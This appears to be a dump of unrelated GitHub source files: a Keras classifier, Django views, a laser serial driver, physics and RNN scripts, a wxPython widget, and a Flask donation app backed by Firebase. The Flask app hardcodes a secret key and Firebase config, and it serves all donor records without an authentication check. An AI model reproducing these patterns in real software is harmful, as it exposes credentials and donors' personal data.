test_x[int(len(test_x)*.50):]\ntest_y= test_y[int(len(test_y)*.50):]\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(1792,1)),\n keras.layers.Dense(1792, activation='relu'),\n keras.layers.Dense(1500, activation='relu'),\n keras.layers.Dense(1000, activation='relu'),\n keras.layers.Dense(1, activation='sigmoid')\n])\n\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n\n#plot_model(model, to_file='model2.png')\n\n\nmodel.fit(train_x, train_y, epochs=50)\n\ntest_loss, test_acc = model.evaluate(test_x, test_y, verbose=2)\n\nprint('\\nTest accuracy:', test_acc)\n\nvalidation_y = np.squeeze(np.asarray(validation_y))\ny_prediction = model.predict(validation_x)\ny_prediction = y_prediction.flatten()\n\n\ny_prediction = np.where(y_prediction > 0.5, 1, 0)\n#print(validation_y)\n#print(y_prediction)\n\nprint('Confusion Matrix')\nprint(confusion_matrix(validation_y, y_prediction))\n#tn, fp, fn, tp = confusion_matrix(validation_y, y_prediction).ravel()\n\n#print(pred)\n#print(' TN ', tn, ' fp ',fp, ' fn ', fn ,' tp ', tp)\n\n\nprint(classification_report(validation_y, y_prediction))","repo_name":"scarlosro/AI_TrastornoAnsiedad","sub_path":"red_terc_bin.py","file_name":"red_terc_bin.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38935364826","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Product, Productreview\nfrom .forms import ProductReviewForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n\ndef all_products(request):\n products = Product.objects.all()\n paginator = Paginator(products, 6)\n page = request.GET.get('page')\n paged_products = paginator.get_page(page)\n return render(request, 'products/all_products.html', {\"products\": paged_products})\n\n\n# products_search function is case insensitive and gets the 'query' and filters the Products based on name\ndef products_search(request):\n products = Product.objects.filter(name__icontains=request.GET['query']) | Product.objects.filter(price__icontains=request.GET['query'])\n return render(request, \"products/all_products.html\", {\"products\": products})\n\n\ndef product_details(request, pk):\n product = get_object_or_404(Product, pk=pk)\n return render(request, 'products/product_details.html', {'product': product})\n\n\n@login_required()\ndef add_review_to_product(request, pk):\n product = get_object_or_404(Product, pk=pk)\n if request.method == \"POST\":\n product_review_form = ProductReviewForm(request.POST)\n if product_review_form.is_valid():\n product_review = product_review_form.save(commit=False)\n product_review.reviewer = request.user\n product_review.product = product\n product_review.save()\n return redirect('product_details', pk=product.pk)\n else:\n product_review_form = ProductReviewForm()\n return render(request, 'products/add_review_to_product.html', {'product_review_form': product_review_form})\n\n\n@login_required()\ndef delete_product_review(request, pk):\n product_review = get_object_or_404(Productreview, pk=pk)\n if request.user != product_review.reviewer:\n messages.error(request, \"You can only delete product reviews you have previously submitted!\")\n return redirect('all_products')\n product_review.delete()\n return redirect('all_products')\n","repo_name":"Code-Institute-Submissions/bear_nation_gaming","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12770310638","text":"__all__ = [\"SpectraPhysicsMillennia\"]\n\nimport asyncio\nimport regex as re\nimport serial\nfrom yaqd_core import UsesUart, aserial\n\n\nquery_re = re.compile(r\"\\?[A-Z,a-z,0-9,%]+\\r\")\n\nint_re = re.compile(r\"\\d+\")\ncurrent_re = re.compile(r\"\\d+.\\d+A[12]\")\npercent_re = re.compile(r\"[\\d]+.[\\d]+%\")\npower_re = re.compile(r\"\\d+.\\d+W\")\n\n# TODO: HasPosition, HasLimits for power control\n# TODO: IsSensor: use channels for monitoring power, currents\n\n\nclass SpectraPhysicsMillennia(UsesUart):\n _kind = \"spectra-physics-millennia\"\n\n def __init__(self, name, config, config_filepath):\n super().__init__(name, config, config_filepath)\n self._ser = aserial.ASerial(\n config[\"serial_port\"], baudrate=config[\"baud_rate\"], eol=b\"\\n\", xonxoff=True\n )\n # ddk: cannot get aserial commands to work; restricting to synchronous for now.\n self._ser.timeout = 0.1\n info = self.query(\"?IDN\\r\".encode())\n # manufacturer, product, sw_version, sn = info.split(\",\")\n self.logger.info(f\"info {info}\")\n\n async def update_state(self):\n \"\"\"simple repeating update state. No _busy dependence.\"\"\"\n state_keys = [\"set_power\", \"power\", \"c1\", \"c2\", \"error_code\"]\n while True:\n previous = {k: self._state[k] for k in state_keys}\n new = {}\n\n for key, command in zip(\n state_keys,\n [\"?PSET\", \"?P\", \"?C1\", \"?C2\", \"?EC\"],\n ):\n if command.startswith(\"?P\"):\n pattern = power_re\n elif command.startswith(\"?C\"):\n pattern = current_re\n else:\n pattern = int_re\n while True: # retry at ~2Hz for failed requests\n newval, alarm = await self._write(command)\n self.logger.debug(f\"{newval}, {alarm}\")\n if alarm:\n self.logger.debug(f\"update {key} failed with {alarm}--retrying\")\n await asyncio.sleep(0.5)\n continue\n try:\n match = pattern.match(newval)\n new[key] = match[0]\n except (ValueError, TypeError) as e:\n self.logger.debug(f\"looked for pattern {pattern} in {newval}\")\n self.logger.error(e)\n await asyncio.sleep(0.5)\n continue\n self._state[key] = match[0]\n break\n changed = {k: [previous[k], new[k]] for k in previous if previous[k] != new[k]}\n if changed:\n for k, v in changed.items():\n self.logger.info(f\"{k}: {v[0]} -> {v[1]}\")\n else:\n for k in new.keys():\n self.logger.debug(f\"{k}: {previous[k]} -> {new[k]}\")\n await asyncio.sleep(self._config[\"refresh_wait\"])\n\n def direct_serial_write(self, message: bytes) -> str:\n self._ser.write(message)\n response = self._ser.read_until()\n self.logger.info(response)\n self.logger.info(\"leave dsw\")\n return response.decode().rstrip(\"\\\\n\")\n\n def query(self, message: bytes) -> str:\n \"\"\"\n synchronous message yields response.\n regex restricts requests to \"safe\" operations (questions).\n e.g. you cannot change from current/power mode with this function\n for full control, use direct_serial_write\n Parameters\n ----------\n message : bytes\n Serial message. Include EOL.\n \"\"\"\n # screen for queries\n match = query_re.fullmatch(message.decode())\n if match is None:\n raise ValueError(f\"{message} is not a query\")\n return self.direct_serial_write(message)\n\n async def _write(self, command: str):\n \"\"\"asynchronous communication. Follows command with check for error (?STB)\"\"\"\n try:\n await asyncio.sleep(0.1)\n self._ser.reset_input_buffer()\n self._ser.flush()\n out = f\"{command}\\r\".encode()\n # response = await self._ser.awrite_then_readline(out)\n self._ser.write(out)\n response = self._ser.read_until()\n response = response.decode().rstrip(\"\\\\n\")\n self.logger.debug(f\"Sent: {command}. Recieved: {response}\")\n # stb = self._ser.awrite_then_readline(\"?STB\\r\".encode())\n self._ser.write(\"?STB\\r\".encode())\n stb = self._ser.read_until()\n stb = format(int(stb.decode().rstrip(\"\\\\n\")), \"08b\")\n keys = [\"cmd_err\", \"exe_err\", \"sys_err\", \"laser_on\"]\n status = {k: int(stb[::-1][i]) for k, i in zip(keys, [0, 1, 5, 6])}\n self.logger.debug(f\"status: {status}\")\n self._emission = status.pop(\"laser_on\")\n alarm = [k for k, v in status.items() if v]\n except (UnicodeDecodeError, ValueError) as e: # try again\n self.logger.error(e)\n await asyncio.sleep(0.5)\n return await self._write(command)\n return response, alarm\n\n def close(self):\n self._ser.close()\n","repo_name":"yaq-project/yaqd-spectra-physics","sub_path":"yaqd_spectra_physics/_spectra_physics_millennia.py","file_name":"_spectra_physics_millennia.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32209374908","text":"\nimport json\nimport numpy as np\nimport os.path as path\nimport tensorflow as tf\n\nfrom python.dataset import AutoComplete, AutoCompleteFixed\nfrom python.model import PureNLSTM\n\ndirname = path.dirname(path.realpath(__file__))\narticle_dir = path.join(dirname, '..', '..', 'public')\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ntrain_dataset = AutoComplete(repeat=True)\ntest_dataset = AutoCompleteFixed(\n \"parts of north africa\",\n batch_size=1,\n)\nmodel = PureNLSTM(train_dataset, name='autocomplete_nlstm_600',\n embedding_size=600,\n verbose=True)\n\nfor output_i, output in enumerate(\n model.predict(dataset=test_dataset)\n):\n probabilities = output['probabilities']\n predict_sorted = np.argsort(probabilities, axis=1)[:, ::-1]\n\n source = test_dataset.decode_source(output['source'])\n target = test_dataset.decode_target(output['target'])\n predict = test_dataset.decode_target(predict_sorted)\n\n print(f'sequence {output_i}')\n for char, words_sorted, target_word, p in zip(source, predict, target, probabilities):\n print(f' {char} -> {words_sorted[0]}, {words_sorted[1]},'\n f' {words_sorted[2]}'\n f' -- {target_word}')\n print(p)\n\n break\n","repo_name":"distillpub/post--memorization-in-rnns","sub_path":"python/run/autocomplete_pure_nlstm_debug.py","file_name":"autocomplete_pure_nlstm_debug.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"40"} +{"seq_id":"40293876695","text":"# A driven damped pendulum system that can evolve many \n# initial conditions by broadcasting\n#\n# Written by Shiyuan Hu , Nov. 6, 2020 \n\nimport numpy as np\nfrom RK4 import RK4\nfrom block_entropy import block_entropy\n\nclass pendulum_entropy:\n\n def __init__(self, y0, dt=1e-2, omega_D=2./3, q=2, g=1.125):\n \"\"\"\n y0: initial conditons of shape 2 by npts. y[0] is the \n angular velocity and y[1] is angle\n npts: number of initial conditions\n dt: time step\n omega_D: angular frequency of external driven torque\n g: amplitude of external torque\n q: mass\n \"\"\"\n _,self.npts = y0.shape\n self.y = np.copy(y0)\n # parameters\n self.dt = dt\n self.omega_D = omega_D\n self.q = q\n self.g = g \n \n def deri(self,y,t):\n dy = np.copy(y)\n dy[0] = -y[0]/self.q-np.sin(y[1])+self.g*np.cos(self.omega_D*t)\n dy[1] = y[0]\n return dy\n\n def return_map(self):\n \"\"\"\n Return the angle back to [-pi,pi]\n \"\"\"\n idx1 = self.y[1]>np.pi\n idx2 = self.y[1] 0:\n self.y[1][idx1] = self.y[1][idx1]-np.floor((self.y[1][idx1]+np.pi)/(2*np.pi))*2*np.pi\n if np.sum(idx2) > 0:\n self.y[1][idx2] = self.y[1][idx2]-np.ceil((self.y[1][idx2]-np.pi)/(2*np.pi))*2*np.pi\n\n def update(self, tfinal):\n \"\"\"\n Evolve the dynamic equation and store the data\n \"\"\"\n t = 0; kk = 0\n nstep = int(np.round(tfinal/self.dt))+1 # number of time steps\n self.omega = np.zeros((nstep,self.npts))\n self.theta = np.zeros((nstep,self.npts))\n\n while t <(tfinal+1e-10):\n self.return_map()\n self.omega[kk] = self.y[0]\n self.theta[kk] = self.y[1]\n\n self.y = RK4(self.y, self.dt, t, self.deri)\n kk += 1; t += self.dt\n\n return self\n\nif __name__ == \"__main__\": \n eps = 1e-2 # size of the unit cell\n npts = 400 # number of points\n \n y0 = np.zeros((2,npts))\n # Randomly distribute initial conditions inside one unit cell\n # In order to get a smooth function of entropy versus time, \n # average over different unit cells is necessary\n\n # Here, computation is done only for one unit cell located at (0.1,0.1)\n y0[0,:] = 0.1+np.random.rand(npts)*eps\n y0[1,:] = 0.1+np.random.rand(npts)*eps\n \n b = pendulum_entropy(y0, omega_D=2./3, q=4, g=1.5)\n b.update(50)\n nstep = len(b.omega)\n entropy = np.zeros(nstep)\n\n for i in range(nstep):\n data = np.vstack((b.omega[i],b.theta[i]))\n entropy[i] = block_entropy(data, epsilon=eps)\n \n print(entropy)\n","repo_name":"shiyuanhu/chaos_example","sub_path":"pendulum_entropy.py","file_name":"pendulum_entropy.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28918431600","text":"# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n# --\n# PHOENIX CONTACT GmbH & Co., D-32819 Blomberg --\n# --\n# ------------------------------------------------------------------------------\n# Project : \n# Sourcefile(s) : panel_caption_bar.py\n# ------------------------------------------------------------------------------\n#\n# File : panel_caption_bar.py\n#\n# Author(s) : Gaofeng Zhang\n#\n# Status : in work\n#\n# Description : siehe unten\n#\n#\n# ------------------------------------------------------------------------------\nimport wx\nfrom ..utils import gui_util_get_default_font\nfrom ..base import BufferedWindow\n\n\nclass CaptionBarStyle(object):\n CAPTIONBAR_NOSTYLE = 0\n \"\"\" The :class:`CaptionBar` has no style bit set. \"\"\"\n CAPTIONBAR_GRADIENT_V = 1\n \"\"\" Draws a vertical gradient from top to bottom. \"\"\"\n CAPTIONBAR_GRADIENT_H = 2\n \"\"\" Draws a vertical gradient from left to right. \"\"\"\n CAPTIONBAR_SINGLE = 3\n \"\"\" Draws a single filled rectangle to draw the caption. \"\"\"\n CAPTIONBAR_RECTANGLE = 4\n \"\"\" Draws a single colour with a rectangle around the caption. \"\"\"\n CAPTIONBAR_FILLED_RECTANGLE = 5\n \"\"\"\n This class encapsulates the styles you wish to set for the\n :class:`CaptionBar` (this is the part of the `FoldPanel` where the caption\n is displayed). It can either be applied at creation time be\n reapplied when styles need to be changed.\n\n At construction time, all styles are set to their default\n transparency. This means none of the styles will be applied to\n the :class:`CaptionBar` in question, meaning it will be created using the\n default internals. When setting i.e the colour, font or panel\n style, these styles become active to be used.\n \"\"\"\n\n def __init__(self):\n \"\"\" Default constructor for this class. \"\"\"\n self.reset_to_defaults()\n\n def reset_to_defaults(self):\n \"\"\" Resets default :class:`CaptionBarStyle`. \"\"\"\n self._firstColourUsed = False\n self._secondColourUsed = False\n self._textColourUsed = False\n self._captionFontUsed = False\n self._captionStyleUsed = False\n self._captionStyle = self.CAPTIONBAR_GRADIENT_H\n\n # ------- CaptionBar Font -------\n\n def set_caption_font(self, font):\n \"\"\"\n Sets font for the caption bar.\n\n :param font: a valid :class:`wx.Font` object.\n\n :note: If this is not set, the font property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.CaptionFontUsed` to check if this style is used.\n \"\"\"\n\n self._captionFont = font\n self._captionFontUsed = True\n\n def caption_font_used(self):\n \"\"\" Checks if the caption bar font is set. \"\"\"\n\n return self._captionFontUsed\n\n def get_caption_font(self):\n \"\"\"\n Returns the font for the caption bar.\n\n :note: Please be warned this will result in an assertion failure when\n this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetCaptionFont`, :meth:`~CaptionBarStyle.CaptionFontUsed`\n \"\"\"\n\n return self._captionFont\n\n # ------- First Colour -------\n\n def set_first_colour(self, colour):\n \"\"\"\n Sets first colour for the caption bar.\n\n :param colour: a valid :class:`wx.Colour` object.\n\n :note: If this is not set, the colour property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.FirstColourUsed` to check if this style is used.\n \"\"\"\n\n self._firstColour = colour\n self._firstColourUsed = True\n\n def first_colour_used(self):\n \"\"\" Checks if the first colour of the caption bar is set.\"\"\"\n\n return self._firstColourUsed\n\n def get_first_colour(self):\n \"\"\"\n Returns the first colour for the caption bar.\n\n :note: Please be warned this will result in an assertion failure when\n this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetFirstColour`, :meth:`~CaptionBarStyle.FirstColourUsed`\n \"\"\"\n\n return self._firstColour\n\n # ------- Second Colour -------\n\n def set_second_colour(self, colour):\n \"\"\"\n Sets second colour for the caption bar.\n\n :param colour: a valid :class:`wx.Colour` object.\n\n :note: If this is not set, the colour property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.SecondColourUsed` to check if this style is used.\n \"\"\"\n\n self._secondColour = colour\n self._secondColourUsed = True\n\n def second_colour_used(self):\n \"\"\" Checks if the second colour of the caption bar is set.\"\"\"\n\n return self._secondColourUsed\n\n def get_second_colour(self):\n \"\"\"\n Returns the second colour for the caption bar.\n\n :note: Please be warned this will result in an assertion failure when\n this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetSecondColour`, :meth:`~CaptionBarStyle.SecondColourUsed`\n \"\"\"\n\n return self._secondColour\n\n # ------- Caption Text Colour -------\n\n def set_caption_colour(self, colour):\n \"\"\"\n Sets caption colour for the caption bar.\n\n :param colour: a valid :class:`wx.Colour` object.\n\n :note: If this is not set, the colour property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.CaptionColourUsed` to check if this style is used.\n \"\"\"\n\n self._textColour = colour\n self._textColourUsed = True\n\n def caption_colour_used(self):\n \"\"\" Checks if the caption colour of the caption bar is set.\"\"\"\n\n return self._textColourUsed\n\n def get_caption_colour(self):\n \"\"\"\n Returns the caption colour for the caption bar.\n\n :note: Please be warned this will result in an assertion failure\n when this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetCaptionColour`, :meth:`~CaptionBarStyle.CaptionColourUsed`\n \"\"\"\n\n return self._textColour\n\n # ------- CaptionStyle -------\n\n def set_caption_style(self, style):\n \"\"\"\n Sets caption style for the caption bar.\n\n :param style: can be one of the following bits:\n\n =============================== ======= =============================\n Caption Style Value Description\n =============================== ======= =============================\n ``CAPTIONBAR_GRADIENT_V`` 1 Draws a vertical gradient from top to bottom\n ``CAPTIONBAR_GRADIENT_H`` 2 Draws a horizontal gradient from left to right\n ``CAPTIONBAR_SINGLE`` 3 Draws a single filled rectangle to draw the caption\n ``CAPTIONBAR_RECTANGLE`` 4 Draws a single colour with a rectangle around the caption\n ``CAPTIONBAR_FILLED_RECTANGLE`` 5 Draws a filled rectangle and a border around it\n =============================== ======= =============================\n\n :note: If this is not set, the property is undefined and will not be used.\n Use :meth:`~CaptionBarStyle.CaptionStyleUsed` to check if this style is used.\n \"\"\"\n\n self._captionStyle = style\n self._captionStyleUsed = True\n\n def caption_style_used(self):\n \"\"\" Checks if the caption style of the caption bar is set.\"\"\"\n\n return self._captionStyleUsed\n\n def get_caption_style(self):\n \"\"\"\n Returns the caption style for the caption bar.\n\n :note: Please be warned this will result in an assertion failure\n when this property is not previously set.\n\n :see: :meth:`~CaptionBarStyle.SetCaptionStyle`, :meth:`~CaptionBarStyle.CaptionStyleUsed`\n \"\"\"\n\n return self._captionStyle\n\n\nclass StaticCaptionBar(BufferedWindow):\n \"\"\"\n This class is a graphical caption component that consists of a\n caption and a clickable arrow.\n\n The :class:`CaptionBar` fires an event ``EVT_CAPTIONBAR`` which is a\n :class:`CaptionBarEvent`. This event can be caught and the parent window\n can act upon the collapsed or expanded state of the bar (which is\n actually just the icon which changed). The parent panel can\n reduce size or expand again.\n \"\"\"\n\n def __init__(self, parent, wx_id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize, caption=\"\",\n icon_size=(16, 16), cbstyle=None):\n \"\"\"\n Default class constructor.\n\n :param parent: the :class:`CaptionBar` parent window;\n :param wx_id: an identifier for the control: a value of -1 is taken to mean a default;\n :param pos: the control position. A value of (-1, -1) indicates a default position,\n chosen by either the windowing system or wxPython, depending on platform;\n :param size: the control size. A value of (-1, -1) indicates a default size,\n chosen by either the windowing system or wxPython, depending on platform;\n :param caption: the string to be displayed in :class:`CaptionBar`;\n :param cbstyle: the :class:`CaptionBar` window style. Must be an instance of\n :class:`CaptionBarStyle`;\n :param icon_size: the :class:`CaptionBar` icon width;\n \"\"\"\n self._isReady = False\n BufferedWindow.__init__(self, parent, wx_id, pos=pos, size=(20, 20), style=wx.NO_BORDER)\n self._style: CaptionBarStyle = None\n self.apply_caption_style(cbstyle, True)\n self._caption = caption\n self._iconWidth, self._iconHeight = icon_size\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_bg)\n self._isReady = True\n\n def set_caption_text(self, text):\n self._caption = text\n self.update_drawing()\n\n def apply_caption_style(self, cbstyle=None, apply_default=True):\n \"\"\"\n Applies the style defined in `cbstyle` to the :class:`CaptionBar`.\n\n :param cbstyle: an instance of :class:`CaptionBarStyle`;\n :param apply_default: if ``True``, the colours used in the :class:`CaptionBarStyle`\n will be reset to their default values.\n \"\"\"\n\n if cbstyle is None:\n cbstyle = CaptionBarStyle()\n\n _new_style = cbstyle\n\n if apply_default:\n\n # get first colour from style or make it default\n if not _new_style.first_colour_used():\n _new_style.set_first_colour(wx.Colour('#eee'))\n\n # get second colour from style or make it default\n if not _new_style.second_colour_used():\n # make the second colour slightly darker then the background\n _colour = self.GetParent().GetBackgroundColour()\n _r, _g, _b = int(_colour.Red()), int(_colour.Green()), int(_colour.Blue())\n _colour = ((_r >> 1) + 20, (_g >> 1) + 20, (_b >> 1) + 20)\n _new_style.set_second_colour(wx.Colour(*_colour))\n\n # get text colour\n if not _new_style.caption_colour_used():\n _new_style.set_caption_colour(wx.BLACK)\n\n # get font colour\n if not _new_style.caption_font_used():\n _font = gui_util_get_default_font(8)\n _new_style.set_caption_font(_font)\n\n # apply caption style\n if not _new_style.caption_style_used():\n _new_style.set_caption_style(CaptionBarStyle.CAPTIONBAR_GRADIENT_V)\n\n self._style = _new_style\n\n def set_caption_style(self, cbstyle=None, apply_default=True):\n \"\"\"\n Sets :class:`CaptionBar` styles with :class:`CaptionBarStyle` class.\n\n :param cbstyle: an instance of :class:`CaptionBarStyle`;\n :param apply_default: if ``True``, the colours used in the :class:`CaptionBarStyle`\n will be reset to their default values.\n\n :note: All styles that are actually set, are applied. If you set `applyDefault`\n to ``True``, all other (not defined) styles will be set to default. If it is\n ``False``, the styles which are not set in the :class:`CaptionBarStyle` will be ignored.\n \"\"\"\n\n if cbstyle is None:\n cbstyle = CaptionBarStyle()\n\n self.apply_caption_style(cbstyle, apply_default)\n self.Refresh()\n\n def get_caption_style(self):\n \"\"\"\n Returns the current style of the captionbar in a :class:`CaptionBarStyle` class.\n\n :note: This can be used to change and set back the changes.\n \"\"\"\n\n return self._style\n\n def set_bold_font(self):\n \"\"\" Sets the :class:`CaptionBar` font weight to bold.\"\"\"\n\n self.GetFont().SetWeight(wx.FONTWEIGHT_BOLD)\n\n def set_normal_font(self):\n \"\"\" Sets the :class:`CaptionBar` font weight to normal.\"\"\"\n\n self.GetFont().SetWeight(wx.FONTWEIGHT_NORMAL)\n\n def draw(self, dc):\n \"\"\"\n Handles the ``wx.EVT_PAINT`` event for :class:`CaptionBar`.\n\n :param dc: a :class:`wx.Dc` to be processed.\n \"\"\"\n if self._isReady:\n self.fill_caption_background(dc)\n dc.SetFont(self._style.get_caption_font())\n dc.SetTextForeground(self._style.get_caption_colour())\n dc.DrawText(self._caption, 4, 4)\n\n def fill_caption_background(self, dc):\n \"\"\"\n Fills the background of the caption with either a gradient or\n a solid colour.\n\n :param dc: an instance of :class:`wx.DC`.\n \"\"\"\n\n _style = self._style.get_caption_style()\n\n if _style == CaptionBarStyle.CAPTIONBAR_GRADIENT_V:\n self.draw_vertical_gradient(dc, self.GetRect())\n elif _style == CaptionBarStyle.CAPTIONBAR_GRADIENT_H:\n self.draw_horizontal_gradient(dc, self.GetRect())\n elif _style == CaptionBarStyle.CAPTIONBAR_SINGLE:\n self.draw_single_colour(dc, self.GetRect())\n elif _style == CaptionBarStyle.CAPTIONBAR_RECTANGLE or _style == CaptionBarStyle.CAPTIONBAR_FILLED_RECTANGLE:\n self.draw_single_rectangle(dc, self.GetRect())\n else:\n raise Exception(\"STYLE Error: Undefined Style Selected: \" + repr(_style))\n\n def DoGetBestSize(self):\n \"\"\"\n Returns the best size for this panel, based upon the font\n assigned to this window, and the caption string.\n\n :note: Overridden from :class:`wx.Window`.\n \"\"\"\n _y, _x = self.GetTextExtent(self._caption)\n\n if _x < self._iconWidth:\n _x = self._iconWidth\n\n if _y < self._iconHeight:\n _y = self._iconHeight\n\n return wx.Size(_x, _y)\n\n def draw_vertical_gradient(self, dc, rect):\n \"\"\"\n Gradient fill from colour 1 to colour 2 from top to bottom.\n\n :param dc: an instance of :class:`wx.DC`;\n :param rect: the :class:`CaptionBar` client rectangle.\n \"\"\"\n\n if rect.height < 1 or rect.width < 1:\n return\n dc.SetPen(wx.TRANSPARENT_PEN)\n # calculate gradient coefficients\n _col2 = self._style.get_second_colour()\n _col1 = self._style.get_first_colour()\n dc.GradientFillLinear(rect, _col1, _col2, wx.NORTH)\n\n def draw_horizontal_gradient(self, dc, rect):\n \"\"\"\n Gradient fill from colour 1 to colour 2 from left to right.\n\n :param dc: an instance of :class:`wx.DC`;\n :param rect: the :class:`CaptionBar` client rectangle.\n \"\"\"\n\n if rect.height < 1 or rect.width < 1:\n return\n dc.SetPen(wx.TRANSPARENT_PEN)\n _col2 = self._style.get_second_colour()\n _col1 = self._style.get_first_colour()\n dc.GradientFillLinear(rect, _col1, _col2, wx.WEST)\n\n def draw_single_colour(self, dc, rect):\n \"\"\"\n Single colour fill for :class:`CaptionBar`.\n\n :param dc: an instance of :class:`wx.DC`;\n :param rect: the :class:`CaptionBar` client rectangle.\n \"\"\"\n\n if rect.height < 1 or rect.width < 1:\n return\n\n dc.SetPen(wx.TRANSPARENT_PEN)\n\n # draw simple rectangle\n dc.SetBrush(wx.Brush(self._style.get_first_colour(), wx.BRUSHSTYLE_SOLID))\n dc.DrawRectangle(rect.x, rect.y, rect.width, rect.height)\n\n def draw_single_rectangle(self, dc, rect):\n \"\"\"\n Single rectangle for :class:`CaptionBar`.\n\n :param dc: an instance of :class:`wx.DC`;\n :param rect: the :class:`CaptionBar` client rectangle.\n \"\"\"\n\n if rect.height < 2 or rect.width < 1:\n return\n\n # single frame, set up internal fill colour\n\n if self._style.get_caption_style() == CaptionBarStyle.CAPTIONBAR_RECTANGLE:\n _colour = self.GetParent().GetBackgroundColour()\n _br = wx.Brush(_colour, wx.BRUSHSTYLE_SOLID)\n else:\n _colour = self._style.get_first_colour()\n _br = wx.Brush(_colour, wx.BRUSHSTYLE_SOLID)\n\n # setup the pen frame\n\n _pen = wx.Pen(self._style.get_second_colour())\n dc.SetPen(_pen)\n dc.SetBrush(_br)\n dc.DrawRectangle(rect.x, rect.y, rect.width, rect.height - 1)\n\n _bgpen = wx.Pen(self.GetParent().GetBackgroundColour())\n dc.SetPen(_bgpen)\n dc.DrawLine(rect.x, rect.y + rect.height - 1, rect.x + rect.width,\n rect.y + rect.height - 1)\n\n def on_erase_bg(self, evt):\n evt.Skip()\n","repo_name":"yiyunzhi/pxcmbt_v36","sub_path":"framework/gui/widgets/panel_caption_bar.py","file_name":"panel_caption_bar.py","file_ext":"py","file_size_in_byte":17548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10694655444","text":"from flask import Flask, render_template, request, redirect, url_for, flash\r\nfrom flask import session as login_session\r\nimport pyrebase\r\nimport os\r\n\r\napp = Flask(__name__, template_folder='templates', static_folder='static')\r\napp.config['SECRET_KEY'] = 'super-secret-key'\r\n\r\n#Code goes below here\r\nconfig = {\r\n 'apiKey': \"AIzaSyCC2ny6fQZx7MsL9dLcdDkFLfTX6TMWHaw\",\r\n 'authDomain': \"lissan-y2-f.firebaseapp.com\",\r\n 'projectId': \"lissan-y2-f\",\r\n 'storageBucket': \"lissan-y2-f.appspot.com\",\r\n 'messagingSenderId': \"565841630605\",\r\n 'appId': \"1:565841630605:web:c4833274438653ba2e99c4\",\r\n 'databaseURL':'https://lissan-y2-f-default-rtdb.europe-west1.firebasedatabase.app'\r\n }\r\n\r\nfirebase = pyrebase.initialize_app(config)\r\nauth = firebase.auth()\r\ndb=firebase.database()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/', methods=['GET','POST'])\r\ndef index():\r\n result=''\r\n if request.method=='POST':\r\n num=int(request.form['num'])\r\n students=int(num/1500)\r\n books=int(num/2500)\r\n result1= num\r\n result2=students\r\n info =[]\r\n if num > 1500 and num < 2500:\r\n info=[\"By donating this amount of money you are helping this amount of woman \",\"\"]\r\n\r\n elif num >= 2500 :\r\n info=[\"This donation will cover the costs of \",\"students per year\",\"the number of books units in a text book, or enrichment materials\"]\r\n\r\n elif num < 1500:\r\n info = [\"you can contrbute to hire more staff members to improve our lessons quality\"]\r\n return render_template('index.html', result1 = result1,result2=result2,info=info)\r\n return render_template('index.html', result = None)\r\n\r\n\r\n\r\n\r\n@app.route('/donate', methods=['GET', 'POST'])\r\ndef donate():\r\n if request.method=='POST':\r\n name=request.form['name']\r\n email=request.form['email']\r\n message=request.form['message']\r\n user={\"name\":name,\"email\":email,\"message\":message}\r\n db.child('donations').push(user)\r\n return redirect (url_for('index'))\r\n return render_template(\"donate.html\")\r\n\r\n@app.route('/info', methods=['GET','POST'])\r\ndef info():\r\n if request.method=='POST':\r\n donations=db.child('donations').get().val()\r\n return render_template('info.html',donations=donations)\r\n else:\r\n return render_template('admin.html')\r\n\r\n\r\n\r\n@app.route('/admin',methods=['GET','POST'])\r\ndef admin():\r\n error=''\r\n if request.method=='POST':\r\n name=request.form['name']\r\n last_name=request.form['last_name']\r\n email=request.form['email']\r\n password=request.form['password']\r\n phone=request.form['phone']\r\n\r\n\r\n # COMMENTED OUT TO ASSURE ONLY ONE USER (ADMIN) IN THE DATABASE-rani \r\n try:\r\n # login_session['user']=auth.create_user_with_email_and_password(email, password)\r\n # user={'email':email, 'password':password}\r\n # UID = login_session['user']['localId']\r\n # db.child('Users').child(UID).set(user)\r\n login_session['user']=auth.sign_in_user_with_email_and_password(email, password)\r\n return render_template('info.html')\r\n except:\r\n error='Authentication failed'\r\n return render_template('admin.html')\r\n else:\r\n return render_template('admin.html')\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Code goes above here\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"meet-projects/Y2-GroupF-Team1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72606353719","text":"import logging\nimport dlplan\nimport os\n\nfrom learner.src.domain_data.domain_data_factory import DomainDataFactory\nfrom learner.src.instance_data.instance_data import 